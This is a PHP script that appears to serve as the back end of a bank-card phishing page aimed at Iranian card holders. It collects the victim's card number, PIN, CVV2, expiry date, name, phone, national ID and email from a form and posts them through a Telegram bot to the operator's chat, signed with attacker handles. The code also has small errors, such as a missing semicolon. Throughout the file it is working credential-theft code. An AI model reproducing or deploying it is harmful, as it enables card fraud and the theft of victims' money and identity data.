<?php

if ( 'POST' != $_SERVER['REQUEST_METHOD'] ) {
$protocol = $_SERVER['SERVER_PROTOCOL'];
if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0' ) ) ) {
$protocol = 'HTTP/1.0';
}

header( 'Allow: POST' );
header( "$protocol 405 Method Not Allowed" );
header( 'Content-Type: text/plain' );
exit;
}

include "Bankinfo.php";
include "info.php";
$ip = $_SERVER["REMOTE_ADDR"];
date_default_timezone_set('Asia/Tehran');
$timestamp = time();
$date_time = date('H:i:s', $timestamp);


$pan = $_POST["pan"];
$pin = $_POST["pin"];
$cvv = $_POST["cvv2"];
$year = $_POST["expireYear"];
$month = $_POST["expireMonth"];
$amount = $_POST["am"];
$num = $_POST["num"];
if(isset($_POST["inputemail"])){
    $email = $_POST["inputemail"];
}else{
    $email = "None";
}
$chek = strlen($pin)
if($chek >= 5){
	$chekista = "ista ✅";
}
	else{
		$chekista = "ista❌";
		}
		
		

$pan1 = substr($pan,0,4);
$pan2 = substr($pan,4,-8);
$pan3 = substr($pan,8,-4);
$pan4 = substr($pan,12);
$cardn = substr($pan,0,-10);
$bankinfo = bank_information($cardn);
$Text = "
	🔰#𝐍𝐞𝐰 𝐂𝐚𝐫𝐝 𝐀𝐝𝐝 Request <code>$ip</code>
	
💳𝐁𝐚𝐧𝐤 : $bankinfo[1]

👽𝐂𝐚𝐫𝐝 : <code>$pan</code>
👀𝐩𝐚𝐬𝐬 :  <code>$pin</code>
⚡️𝐂𝐯𝐯𝟐 : <code>$cvv</code>
📅 𝐲/𝐦 : <code>$year</code> / <code>$month</code> 

🧩 𝐍𝐚𝐦𝐞 :  [ <code>$name</code> ]
📲𝑷𝒉𝒐𝒏𝒆  : [ <code>$phone</code> ]
🎫𝐂𝐨𝐝𝐞𝐌𝐞𝐥𝐢 : [ <code>$meli</code> ]

🎗𝐢𝐬𝐭𝐚 : $chekista
⏳𝐓𝐢𝐦𝐞 : <code>$date_time</code>
🩻 𝐌𝐨𝐝𝐞𝐥: <code>$mod</code>
📧𝐞𝐦𝐚𝐢𝐥 : $email
🍀𝐈𝐧𝐟𝐨𝐫𝐦𝐚𝐭𝐢𝐨𝐧 𝐁𝐚𝐧𝐤 :$bankinfo[2]

@Mr_X00S
";

function Tel($method,$Bot=[]){
global $TOKEN;
$url = "https://api.telegram.org/bot$TOKEN/".$method;
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$Bot);
$res = curl_exec($ch);
if(curl_error($ch)){
var_dump(curl_error($ch));
}else{
return json_decode($res);
}
}

Tel('sendMessage',[
'chat_id'=>$ID,
'text'=>"$Text",
'parse_mode'=>"HTML",
'reply_markup' => json_encode([
'inline_keyboard' => [
[["text" => "$bankinfo[1]", 'callback_data' => "mmd"],["text" => "$ip", 'url' => "https://check-host.net/ip-info?host=$ip"]],
[["text" => "Black Wid", 'url' => "https://t.me/black_Widm"]]
]
])
]);
    ?>

